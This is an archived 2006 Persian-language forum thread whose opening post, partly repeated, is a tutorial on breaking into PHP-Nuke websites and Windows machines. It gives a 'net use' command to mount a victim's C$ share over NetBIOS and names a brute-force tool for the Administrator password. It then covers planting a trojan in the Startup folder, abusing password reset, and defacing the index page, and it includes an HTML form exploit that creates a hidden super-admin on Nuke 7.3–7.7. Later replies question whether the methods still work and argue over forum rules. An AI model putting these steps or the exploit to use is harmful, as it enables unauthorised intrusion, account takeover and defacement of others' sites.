PDA

نسخه کامل مشاهده نسخه کامل : آموزش هک کردن سایت



SAMANN
24-07-2006, 21:56
سلام دوستان
خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و... حالا در این درس به آموزش چندین روش برای آموزش هک متداول ترین فروم که PHP-Nuke است بپردازیم.
اول باید خصوصیات سایت را بررسی کنید و اولین خوصوصیات ضروری پی اچ پی نوک بودن آن هست! به روش های مختلف هک کردنه یوزر ادمین یا ساختن ادمین مخفی را یاد بگیرید.
در هر سایت نوک یک فروم قرار دارد و همینوطور که میدانید در فروم یک یا چند نفر به cp (مخفف کنترل پانل) دسترسی دارند. شاید از همین فکر چیزی فهمیده باشید. پس در هر تالار چندین کاربر (user) وجود دارد (بستگی به کیفیت تالار دارد) و مدیر هم در بین این کاربران هست و نا کاربری او فاحش هست و می توانید آن را به راحتی ببینید.با این توضیح شما دو روش را برای هم حدس زدید. درسته ! می گن هک سایت سخته ولی اونقدرا هم سخت نیست حتی با ماجیک هم میشه سایت هک کرد! پس فعلا با ماجیک هک می کنیم تا برسیم به جاهای پیشرفته!
..آموزش عزراییل جون رو بخونید در مورد نفوذ به سیستم از طریق نت بایوس (در انجمن هک و امنیت) و بعد ادامه ی این درس را بخونید.
حالا که یک تروجان در ستارت آپ طرف کپی شد و پسورد او را دریافت کردید.....
هر کاربر در هنگام ثبت نام در هر تالاری در سایت های نوک باید به اجبار ایمیلی برای خود انتخاب کند که پسورد انتخاب شده به آن ایمیل ارسال شود. ایم خودش یک باگ امنیتی هست و لازم نیست که حتما اکسپلویتی جولوی شما باشد! (ولی بعد از این روش با اکسپلویتی برای هک نوک هک آشنا می شوید)خوب به قسمت (رمزعبور را فراموش کردم) یا ( Forget PassWord ) بروید و ایمیل طرف را وارد تا پسورد فرستاده شود. (این عمل در صورتی اتفاق می شود که نام کاربری بوسیله ی یک ایمیل پشتیبانی شود که در اغلب فروم ها اینجوری هست) حالا که پسورد کاربر مدیر و یا همان شناسه مدیر را گرفتید به منطقه ی کنترل (کنترل پانل) نفوذ کنید و شناسه ی حای را پاک کرده و شناسه ای بسازید و index را عوض کنید.

خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و... حالا در این درس به آموزش چندین روش برای آموزش هک متداول ترین فروم که PHP-Nuke است بپردازیم.
اول باید خصوصیات سایت را بررسی کنید و اولین خوصوصیات ضروری پی اچ پی نوک بودن آن هست! به روش های مختلف هک کردنه یوزر ادمین یا ساختن ادمین مخفی را یاد بگیرید.
در هر سایت نوک یک فروم قرار دارد و همینوطور که میدانید در فروم یک یا چند نفر به cp (مخفف کنترل پانل) دسترسی دارند. شاید از همین فکر چیزی فهمیده باشید. پس در هر تالار چندین کاربر (user) وجود دارد (بستگی به کیفیت تالار دارد) و مدیر هم در بین این کاربران هست و نا کاربری او فاحش هست و می توانید آن را به راحتی ببینید.با این توضیح شما دو روش را برای هم حدس زدید. درسته ! می گن هک سایت سخته ولی اونقدرا هم سخت نیست حتی با ماجیک هم میشه سایت هک کرد! پس فعلا با ماجیک هک می کنیم تا برسیم به جاهای پیشرفته! حالا بايد به سيستم طرف براي نصب تروجان نفوذ كنيد و نت بايوس بهترين راه هست!
نفوذ به سيستم از طريق NetBios
-------------------------------------------
با یاد گیری این مقاله شما میتونید یک درایو از سیستم قربانی رو به وسیله نت بایوس Share کنید و هر کاری که خواستید توی اون درایو انجام بدید ( فایل بذارید ، بردارید ، پاک کنید و ... ) البته من این مقاله رو به صورت تصویری هم تو سایت گذاشتم ، می تونید دانلود کنید.
خب بریم سره موضوع اصلی:
اول باید IP سیستم مورد نظر رو پیدا کنید ( تو سایت قبلا اموزش دادم ) ، بعد از منوی Start قسمت Run برید و تایپ کنید CMD. بعد از اینکه وارد CMD شدید این دستور رو بنویسید:
Net use x: \\IP\DriveName$
به جای X میتونید هر حرفی رو بنویسید به غیر از حروفی که اسم درایو های خودتون هست.مثلا اگه درایو G داشته باشید ، از حرف G نمیتونید استفاده کنید. به جای IP هم ای پی مورد نظر رو که می خواهید بهش نفوذ کنید رو بنویسید. به جای DriveName هم اسم درایو رو بنویسید. اگه مثلا میخواهید درایو C رو Share کنید ، حرف c رو بنویسید.یک نمونه از دستور رو ببینید:
Net use x: \\80.191.191.39\c$
اگه کمی شانس داشته باشید بدون در خواست User Name و Password درایو Share میشه و این پیغام رو مینویسه: The command completed successfully اما اگه از شما در خواست یوزر نیم و پسورد کرد به جای یوزر نیم کلمه Administrator رو وارد کنید که برای ویندوز XP و 2000 تعریف شده است ( البته معمولا تو یه خط یوزر نیم رو میده ).پسورد هم میتونید با یه برنامه مثل بروتوس( Brutus ) پیدا کنید.
اگه شما درایوی رو Share کرده باشید که ویندوز قربانی هم تو همون درایو نصب شده باشه ، می تونید سرور یک تروجان رو تو پوشه Startup تو قسمت Start Menu کپی کنید و منتظر باشد قربانی ریستارت کنه تا فایل سرور اجرا شه و شما به راحتی با تروجان به سیستم وارد بشید. ( یادتون باشه که سرور رو فقط کپی کنید چون اگه اجرا کنید در واقع تو سیستم خودتون اجرا کردید ) (نويسنده : فرشاد عزيز)
حالا که یک تروجان در ستارت آپ طرف کپی شد و پسورد او را دریافت کردید.....
هر کاربر در هنگام ثبت نام در هر تالاری در سایت های نوک باید به اجبار ایمیلی برای خود انتخاب کند که پسورد انتخاب شده به آن ایمیل ارسال شود. ایم خودش یک باگ امنیتی هست و لازم نیست که حتما اکسپلویتی جولوی شما باشد! (ولی بعد از این روش با اکسپلویتی برای هک نوک هک آشنا می شوید)خوب به قسمت (رمزعبور را فراموش کردم) یا ( Forget PassWord ) بروید و ایمیل طرف را وارد تا پسورد فرستاده شود. (این عمل در صورتی اتفاق می شود که نام کاربری بوسیله ی یک ایمیل پشتیبانی شود که در اغلب فروم ها اینجوری هست) حالا که پسورد کاربر مدیر و یا همان شناسه مدیر را گرفتید به منطقه ی کنترل (کنترل پانل) نفوذ کنید و شناسه ی حای را پاک کرده و شناسه ای بسازید و index را عوض کنید. قبل از اینکه ورود به کنترل پانل را به شما یاد دهیم بهتر استروش دیگری برای ساخت ادمین مخفی ( hide admin ) یاد بگیریم! اول باید بفهمیم که نوک چیست؟
پی اچ پی نوک انواع مختلفی دارد که از سال ۲۰۰۱ به ورژن های مجانی تبدیل شد و برای همین شهرت زیادی پیدا کرد در ابتدا تیم های آمریکایی و پاکستانی ورزن های ۶.۸ . ۶.۹ را مجانی کردند و ایرانی های عزیز نیز برای هموطننانشان از ورژن ۷.۳ تا ۷.۸ (آخرین نسخه) را ترجمه کردند و نوک های فراسی را بوجود آوردند. مثل گروه معروف IranNuke
این اکسپلویت هم به شما کمک می کند که در کنترل پانل سایت نوک وارد شوید و شناسه ی مدیرتی برای خود بسازید. این اکسپولیت برای نوک ۷.۳ تا ۷.۷ هست و نوک ۷.۸ را فقط اگر روی لکال هاست باشد هک می کند.




<form name="mantra" method="POST" action="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]"> USERNAME: <input type="text" name="add_aid"><br> NOME: <input type="text" name="add_name"><br> PASSWORD: <input type="text" name="add_pwd"><br> E-MAIL: <input type="text" name="add_email"><br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><br> <input type="hidden" name="add_radminsuper" value="1"><br> <input type="hidden" name="op" value="AddAuthor"></p> <input type="submit" name="Submit" value="Create Admin"><br> </form>



خوب در قسمتی از کد نوشته شده: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
به جای sitename نام سایت را بنویسید و آن را با پسوند html ذخیره سازید.
به این صورت : exploit.html
حالا روی آن کلیک کنید و صفحه ای همانند صفحه ی عضویت در آن تالار باز می شود! (حالا بستگی دارد که چه چیز هایی از شما درخواست کند) حالا آن را که پر کردید در زیر آن Create Admin را کلیک کنید و مستقیما به [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] میرید و اونجا با یوزری (شناسه ایی) که ساختید وارد شوید! حالا شما هم سایت پی اچ پی نوک هک کردید!

موفق باشید



منبع:[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

Bedahe
24-07-2006, 22:23
عملیه واقعا ؟

SAMANN
24-07-2006, 22:33
ویرایش شد.

SAMANN
24-07-2006, 22:46
ویرایش شد---------

Bedahe
24-07-2006, 22:47
پس خیلی دمت گرم اسباب نفرینمون رو جور کردی یه تست میزنم یکی دو جا ببینم چی میشه !

Omidpsp
25-07-2006, 00:40
داش سامان شما فکر کنم سیستم نگهبان نیوک رو فراموش کردی عزیز
اگه هک کردن نیوک اینقدر ساده بود که الان..............
درسته بچه های پی سی ورلد(این دوتا دوست) یکمی در این مورد اطلاع نداشتن ولی دیگه شما حق نداری اینارو ببخشید ببو گیر بیاری
هر چی خواستی بهشون بگی
توصیه میکنم سیستم نگهبان نیوک رو یه مطالعه روش بکن
ببخشید اگه تند حرف زدم

soleares
25-07-2006, 00:47
بابا كارت درسته ولي فكر نكنم بشه حتي يه دونه رو هك كرد چون اونا خودشون ختم اين كاران در ضمن يه هوديدي خودت هك شدي !

SAMANN
25-07-2006, 01:41
داش سامان شما فکر کنم سیستم نگهبان نیوک رو فراموش کردی عزیز
اگه هک کردن نیوک اینقدر ساده بود که الان..............
درسته بچه های پی سی ورلد(این دوتا دوست) یکمی در این مورد اطلاع نداشتن ولی دیگه شما حق نداری اینارو ببخشید ببو گیر بیاری
هر چی خواستی بهشون بگی
توصیه میکنم سیستم نگهبان نیوک رو یه مطالعه روش بکن
ببخشید اگه تند حرف زدم
چشم چشم
ما که زورمون به شما نمی رسه
ببخشید من اینقدر خونسردم!!

N0Body
01-09-2006, 02:04
تورو خدا يه نگاهي به چيزايي كه گفتي بكن ! مال زمانيه كه هيتلر گروهبان يك بود ! اين مطالب هيچ ارزشي ندارند الان ! البته من قصد ندارم كاره كسي روكوچيك كنم ! :cool:

chovalier
01-09-2006, 13:51
تورو خدا يه نگاهي به چيزايي كه گفتي بكن ! مال زمانيه كه هيتلر گروهبان يك بود ! اين مطالب هيچ ارزشي ندارند الان ! البته من قصد ندارم كاره كسي روكوچيك كنم ! :cool:
سلام دوست عزیز
طبق قوانین هر گونه انتقاد از هر مطلبی ممنوع هست و مدیریت به شدت با اون برخورد می کنه لطف کنید پستتون رو ویرایش کنید
ممنونم
موفق باشی دوست عزیز...

e.khafan!
13-09-2006, 21:11
هی سلامییییییییییییییییییییی ییییییییییییییییییییییییی ییییییی

rootnt
13-09-2006, 23:09
هی سلامییییییییییییییییییییی ییییییییییییییییییییییییی ییییییی
خدایا به مدیر این انجمن صبر بده

سلام دوست عزیز
طبق قوانین هر گونه انتقاد از هر مطلبی ممنوع هست و مدیریت به شدت با اون برخورد می کنه لطف کنید پستتون رو ویرایش کنید
ممنونم
موفق باشی دوست عزیز...
میشه لطف کنید لینک این قانون رو بدید من هم ببینم؟

این مطلب هم در جای خودش ارزش داره ولی خوب الان دیگه تقریبا نا کار آمد هستش
خوب انتقاد کردن آسونه
هر کسی بهتر بلده بسم الله
ما هم استفاده می کنیم

chovalier
14-09-2006, 02:42
خدایا به مدیر این انجمن صبر بده

میشه لطف کنید لینک این قانون رو بدید من هم ببینم؟

این مطلب هم در جای خودش ارزش داره ولی خوب الان دیگه تقریبا نا کار آمد هستش
خوب انتقاد کردن آسونه
هر کسی بهتر بلده بسم الله
ما هم استفاده می کنیم
سلام عزیــــــــــــــــــــــ ـــــــــــزم
وضعیت انجمن لینوکس و اینا خوبه؟ :)
اون تیکه ی اول قبل از نقل قول صحبت منو واقعا خوب اومدی !
واقعا Harry Potter جان زحمت می کشن و قابل تحسینه این زحمت
در باره ی سوالتون باید بگم این قانون به شدت تاکید شده و اندش بن شدن یه نفره :blink: :blink: :blink:
اینم لینک این قانون: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
اینم اون تیکه که ازش عکس گرفتم برای شما: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
به گفته ی rootnt عزیـــــــــز ریسایز شد !
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
چطوره؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
ممنونم [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
موفق باشی...

K053_LSH_KV90
14-09-2006, 09:22
همين جوريه كه تو فروم هاي خارجي مارو به زور راه ميدن !!!
(به همين راحتي ! )

rootnt
14-09-2006, 10:44
chovalier عزیز از شما تشکر می کنم
خدا رو شکر که تا حالا از این کار های غیر قانونی نکردم

چطوره؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
خوب بهتره که دیگه بحثهای خارج از موضوع تاپیک انجام ندیم
فقط این عکس داخل آخرین پست شما یه خورده بزرگه و خلاف قوانین هستش و لطف کنید ریسایزش کنید
هر کسی هم سوالی داره میتونه توی پیغام خصوصی با من مطرح کنه